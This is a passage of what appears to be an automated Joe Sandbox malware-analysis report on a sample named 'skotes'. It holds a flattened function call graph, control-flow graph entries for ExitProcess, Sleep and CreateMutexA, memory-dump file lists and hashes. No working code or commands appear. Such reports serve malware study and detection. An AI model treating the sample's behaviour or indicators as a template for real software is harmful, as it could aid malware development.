RtlAllocateHeap 12198->12203 12202 472226 12200->12202 12204 4a6c5a ___std_exception_copy RtlAllocateHeap 12202->12204 12205 472247 12203->12205 12204->12201 12206 4a6c5a ___std_exception_copy RtlAllocateHeap 12205->12206 12207 472252 12206->12207 12246 4879c0 12247 4879e0 12246->12247 12247->12247 12248 4880c0 RtlAllocateHeap 12247->12248 12249 4879f2 12248->12249 12250 4883c0 12251 487760 RtlAllocateHeap 12250->12251 12252 488439 12251->12252 12253 488f40 RtlAllocateHeap 12252->12253 12254 488454 12252->12254 12253->12254 12255 488f40 RtlAllocateHeap 12254->12255 12257 4884a8 12254->12257 12256 4884ee 12255->12256 12258 4787d0 12259 4788d3 12258->12259 12268 478819 shared_ptr 12258->12268 12260 4880c0 RtlAllocateHeap 12259->12260 12265 478923 12260->12265 12261 47896c 12264 488200 RtlAllocateHeap 12261->12264 12262 478949 shared_ptr 12263 4880c0 RtlAllocateHeap 12263->12268 12266 478971 12264->12266 12265->12262 12267 4a6c6a RtlAllocateHeap 12265->12267 12267->12261 12268->12259 12268->12261 12268->12263 12268->12265 12309 473fe0 12310 474022 12309->12310 12311 4740d2 12310->12311 12312 47408c 12310->12312 12315 474035 std::invalid_argument::invalid_argument 12310->12315 12313 473ee0 4 API calls 12311->12313 12316 4735e0 12312->12316 12313->12315 12317 48d3e2 RtlAllocateHeap 12316->12317 12318 473616 12317->12318 12322 47364e Concurrency::cancel_current_task shared_ptr std::invalid_argument::invalid_argument 12318->12322 12323 472ce0 12318->12323 12320 47369e 12321 472c00 4 API calls 12320->12321 12320->12322 12321->12322 12322->12315 12324 472d1d 12323->12324 12325 48bedf InitOnceExecuteOnce 12324->12325 12326 472d46 12325->12326 12327 472d88 12326->12327 12328 472d51 std::invalid_argument::invalid_argument 12326->12328 12332 48bef7 12326->12332 12330 472440 4 API calls 12327->12330 12328->12320 12331 472d9b 12330->12331 12331->12320 12333 48bf03 12332->12333 12341 472900 12333->12341 12335 48bf23 std::_Throw_future_error 12336 48bf6a 12335->12336 12337 48bf73 12335->12337 12351 48be7f 12336->12351 12339 472ae0 5 API calls 12337->12339 12340 48bf6f 12339->12340 12340->12327 12342 4880c0 RtlAllocateHeap 12341->12342 12343 47294f 12342->12343 12344 4726b0 RtlAllocateHeap 12343->12344 12346 472967 12344->12346 12345 47298d shared_ptr 12345->12335 12346->12345 12347 4a6c6a RtlAllocateHeap 12346->12347 12348 4729b6 12347->12348 12349 4a38af ___std_exception_copy RtlAllocateHeap 12348->12349 12350 4729e4 12349->12350 12350->12335 12352 48cc31 InitOnceExecuteOnce 12351->12352 12353 48be97 12352->12353 12354 48be9e 12353->12354 12355 4a6cbb 4 API calls 12353->12355 12354->12340 12356 48bea7 12355->12356 12356->12340 12357 4885e0 12358 4885f6 12357->12358 12358->12358 12359 48860b 12358->12359 12360 488f40 RtlAllocateHeap 12358->12360 12360->12359 12361 488de0 12362 488f2f 12361->12362 12363 488e05 12361->12363 12364 489270 RtlAllocateHeap 12362->12364 12367 488e4c 12363->12367 12368 488e76 12363->12368 12365 488f34 12364->12365 12366 472480 RtlAllocateHeap 12365->12366 12374 488e5d __cftof 12366->12374 12367->12365 12369 488e57 12367->12369 12372 48d3e2 RtlAllocateHeap 12368->12372 12368->12374 12371 48d3e2 RtlAllocateHeap 12369->12371 12370 4a6c6a RtlAllocateHeap 12373 488f3e 12370->12373 12371->12374 12372->12374 12374->12370 12375 488eed shared_ptr __cftof 12374->12375 12376 4755f0 12377 475610 12376->12377 12378 4722c0 4 API calls 12377->12378 12379 475710 std::invalid_argument::invalid_argument 12377->12379 12378->12377 12380 4743f0 12381 48bedf InitOnceExecuteOnce 12380->12381 12382 47440a 12381->12382 12383 474411 12382->12383 12384 4a6cbb 4 API calls 12382->12384 12385 474424 12384->12385 12394 478980 12403 478aea 12394->12403 12404 4789d8 shared_ptr 12394->12404 12395 487a00 RtlAllocateHeap 12395->12404 12396 475c10 4 API calls 12396->12404 12397 478b20 12399 488200 RtlAllocateHeap 12397->12399 12398 4880c0 RtlAllocateHeap 12398->12404 12400 478b25 12399->12400 12401 4a6c6a RtlAllocateHeap 12400->12401 12402 478b2a 12401->12402 12404->12395 12404->12396 12404->12397 12404->12398 12404->12400 12404->12403 12443 472b90 12444 472bce 12443->12444 12445 48b7fb TpReleaseWork 12444->12445 12446 472bdb shared_ptr std::invalid_argument::invalid_argument 12445->12446 12447 473f9f 12448 473fad 12447->12448 12452 473fc5 12447->12452 12449 472410 5 API calls 12448->12449 12450 473fb6 12449->12450 12451 473ce0 RtlAllocateHeap 12450->12451 12451->12452 12453 479ba5 12454 479ba7 12453->12454 12455 487a00 RtlAllocateHeap 12454->12455 12456 479ca9 12455->12456 12457 475c10 4 API calls 12456->12457 12458 479cb1 12457->12458 12459 478b30 4 API calls 12458->12459 12460 479cc2 12459->12460 12461 488220 RtlAllocateHeap 12460->12461 12462 479cd1 12461->12462 12512 476db5 12513 476dc2 12512->12513 12514 476df5 12513->12514 12515 476dca 12513->12515 12517 4880c0 RtlAllocateHeap 12514->12517 12516 4880c0 RtlAllocateHeap 12515->12516 12518 476deb shared_ptr 12516->12518 12517->12518 12519 476ec1 shared_ptr 12518->12519 12520 4a6c6a RtlAllocateHeap 12518->12520 12521 476ee3 12520->12521 12522 4a8bbe 12523 4a8868 4 API calls 12522->12523 12524 4a8bdc 12523->12524 12525 47b7b1 12526 47b7be 12525->12526 12527 487a00 RtlAllocateHeap 12526->12527 12528 47b7f3 12527->12528 12529 487a00 RtlAllocateHeap 12528->12529 12530 47b80b 12529->12530 12531 487a00 RtlAllocateHeap 12530->12531 12532 47b823 12531->12532 12533 487a00 RtlAllocateHeap 12532->12533 12534 47b835 12533->12534 12539 4a67b7 12540 4a67c3 __dosmaperr 12539->12540 12541 4a67cd 12540->12541 12544 4a67e2 12540->12544 12542 4a75f6 __dosmaperr RtlAllocateHeap 12541->12542 12543 4a67d2 12542->12543 12545 4a6c5a ___std_exception_copy RtlAllocateHeap 12543->12545 12547 4a67dd 12544->12547 12548 4a6740 12544->12548 12545->12547 12549 4a674d 12548->12549 12550 4a6762 12548->12550 12551 4a75f6 __dosmaperr RtlAllocateHeap 12549->12551 12556 4a675d 12550->12556 12564 4aa038 12550->12564 12553 4a6752 12551->12553 12555 4a6c5a ___std_exception_copy RtlAllocateHeap 12553->12555 12555->12556 12556->12547 12560 4a6785 12581 4aaebb 12560->12581 12563 4aadf5 ___free_lconv_mon RtlAllocateHeap 12563->12556 12565 4aa050 12564->12565 12569 4a6777 12564->12569 12566 4aafe4 RtlAllocateHeap 12565->12566 12565->12569 12567 4aa06e 12566->12567 12596 4b0439 12567->12596 12570 4ab00b 12569->12570 12571 4ab022 12570->12571 12572 4a677f 12570->12572 12571->12572 12573 4aadf5 ___free_lconv_mon RtlAllocateHeap 12571->12573 12574 4aafe4 12572->12574 12573->12572 12575 4aaff0 12574->12575 12576 4ab005 12574->12576 12577 4a75f6 __dosmaperr RtlAllocateHeap 12575->12577 12576->12560 12578 4aaff5 12577->12578 12579 4a6c5a ___std_exception_copy RtlAllocateHeap 12578->12579 12580 4ab000 12579->12580 12580->12560 12582 4aaecc 12581->12582 12583 4aaee1 12581->12583 12584 4a75e3 __dosmaperr RtlAllocateHeap 12582->12584 12585 4aaf2a 12583->12585 12589 4aaf08 12583->12589 12586 4aaed1 12584->12586 12587 4a75e3 __dosmaperr RtlAllocateHeap 12585->12587 12588 4a75f6 __dosmaperr RtlAllocateHeap 12586->12588 12590 4aaf2f 12587->12590 12593 4a678b 12588->12593 12614 4aae2f 12589->12614 12592 4a75f6 __dosmaperr RtlAllocateHeap 12590->12592 12594 4aaf37 12592->12594 12593->12556 12593->12563 12595 4a6c5a ___std_exception_copy RtlAllocateHeap 12594->12595 12595->12593 12597 4b0445 __dosmaperr 12596->12597 12598 4b044d 12597->12598 12599 4b0465 12597->12599 12600 4a75e3 __dosmaperr RtlAllocateHeap 12598->12600 12601 4b0500 12599->12601 12609 4b0497 12599->12609 12602 4b0452 12600->12602 12603 4a75e3 __dosmaperr RtlAllocateHeap 12601->12603 12604 4a75f6 __dosmaperr RtlAllocateHeap 12602->12604 12605 4b0505 12603->12605 12607 4b045a 12604->12607 12606 4a75f6 __dosmaperr RtlAllocateHeap 12605->12606 12608 4b050d 12606->12608 12607->12569 12610 4a6c5a ___std_exception_copy RtlAllocateHeap 12608->12610 12609->12607 12611 4a75f6 __dosmaperr RtlAllocateHeap 12609->12611 12610->12607 12612 4b04be 12611->12612 12613 4a75e3 __dosmaperr RtlAllocateHeap 12612->12613 12613->12607 12615 4aae3b __dosmaperr 12614->12615 12616 4aae7b 12615->12616 12617 4aae70 12615->12617 12619 4a75f6 __dosmaperr RtlAllocateHeap 12616->12619 12621 4aaf48 12617->12621 12620 4aae76 12619->12620 12620->12593 12632 4ac0de 12621->12632 12623 4aaf5e 12629 4aafd8 12623->12629 12630 4a75c0 __dosmaperr RtlAllocateHeap 12623->12630 12624 4aaf58 12624->12623 12626 4ac0de RtlAllocateHeap 12624->12626 12631 4aaf90 12624->12631 12625 4ac0de RtlAllocateHeap 12625->12623 12627 4aaf87 12626->12627 12628 4ac0de RtlAllocateHeap 12627->12628 12628->12631 12629->12620 12630->12629 12631->12623 12631->12625 12633 4ac0eb 12632->12633 12635 4ac100 12632->12635 12634 4a75e3 __dosmaperr RtlAllocateHeap 12633->12634 12636 4ac0f0 12634->12636 12637 4a75e3 __dosmaperr RtlAllocateHeap 12635->12637 12639 4ac125 12635->12639 12638 4a75f6 __dosmaperr RtlAllocateHeap 12636->12638 12640 4ac130 12637->12640 12641 4ac0f8 12638->12641 12639->12624 12642 4a75f6 __dosmaperr RtlAllocateHeap 12640->12642 12641->12624 12643 4ac138 12642->12643 12644 4a6c5a ___std_exception_copy RtlAllocateHeap 12643->12644 12644->12641

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 358 4a652b-4a6538 call 4aa302 361 4a655a-4a656c call 4a656d ExitProcess 358->361 362 4a653a-4a6548 GetPEB 358->362 362->361 364 4a654a-4a6559 362->364 364->361
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32(?,?,004A652A,?,?,?,?,?,004A7661), ref: 004A6567
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2224996195.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2224670067.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2224996195.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225159080.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225176441.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225279090.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225572927.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225657582.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225758100.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225783831.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225840476.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225840476.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225942676.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225988723.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226005704.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226022713.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226039783.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226056811.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226077921.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226094470.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226109889.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226125265.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226140557.0000000000699000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226154213.000000000069A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226170008.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226194580.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226211891.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226230667.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226252851.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226275489.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226294618.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226315018.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226331084.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226352626.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226368505.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226384464.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226400933.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226416513.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226434118.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226455642.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226478790.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226571879.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226593603.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226611832.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226611832.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226656798.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226675931.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226690703.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226706831.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226722414.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226740940.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226757505.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExitProcess
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 621844428-0
                                                                                                                                                                                                                                                  • Opcode ID: 62f6f249ed1cb511b939d793a017c3f59acd80552471b41f7c4b910aeb151039
                                                                                                                                                                                                                                                  • Instruction ID: f8164cef0383df18adea4a674cf6b34acd2fbf1e673b79fa05b0c7133ad49a52
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 62f6f249ed1cb511b939d793a017c3f59acd80552471b41f7c4b910aeb151039
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 01E08C34500148BFCE257B19D80DA4D7B2AEB36755F0A4809FC0846222CB2AEFA1CA84

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 0047A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,004D3254), ref: 0047A981
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2224996195.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2224670067.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2224996195.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225159080.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225176441.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225279090.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225572927.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225657582.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225758100.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225783831.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225840476.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225840476.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225942676.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225988723.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226005704.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226022713.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226039783.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226056811.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226077921.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226094470.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226109889.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226125265.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226140557.0000000000699000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226154213.000000000069A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226170008.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226194580.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226211891.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226230667.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226252851.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226275489.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226294618.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226315018.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226331084.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226352626.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226368505.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226384464.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226400933.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226416513.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226434118.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226455642.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226478790.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226571879.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226593603.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226611832.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226611832.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226656798.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226675931.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226690703.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226706831.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226722414.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226740940.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226757505.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID: T2M
                                                                                                                                                                                                                                                  • API String ID: 1464230837-1911109154
                                                                                                                                                                                                                                                  • Opcode ID: 3e11c2ab9da7139a9805c6713e8008d8b5f2db3c3e3427d2822d3ce3c0d612be
                                                                                                                                                                                                                                                  • Instruction ID: b3443bfe3afa7992c30f355333c6efc3eb42469c3b476dfd70941ad57f6b30d9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3e11c2ab9da7139a9805c6713e8008d8b5f2db3c3e3427d2822d3ce3c0d612be
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50313B71B002008BEF18DB78DD8DB9DB762ABC6310F24C61AE018973D6C77D9990875A

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 22 479f44-479f64 26 479f66-479f72 22->26 27 479f92-479fae 22->27 28 479f74-479f82 26->28 29 479f88-479f8f call 48d663 26->29 30 479fb0-479fbc 27->30 31 479fdc-479ffb 27->31 28->29 34 47a92b 28->34 29->27 36 479fd2-479fd9 call 48d663 30->36 37 479fbe-479fcc 30->37 32 479ffd-47a009 31->32 33 47a029-47a916 call 4880c0 31->33 39 47a01f-47a026 call 48d663 32->39 40 47a00b-47a019 32->40 42 47a953-47a994 Sleep CreateMutexA 34->42 43 47a92b call 4a6c6a 34->43 36->31 37->34 37->36 39->33 40->34 40->39 52 47a9a7-47a9a8 42->52 53 47a996-47a998 42->53 43->42 53->52 54 47a99a-47a9a5 53->54 54->52
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 0047A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,004D3254), ref: 0047A981
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2224996195.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2224670067.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2224996195.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225159080.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225176441.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225279090.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225572927.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225657582.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225758100.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225783831.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225840476.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225840476.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225942676.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
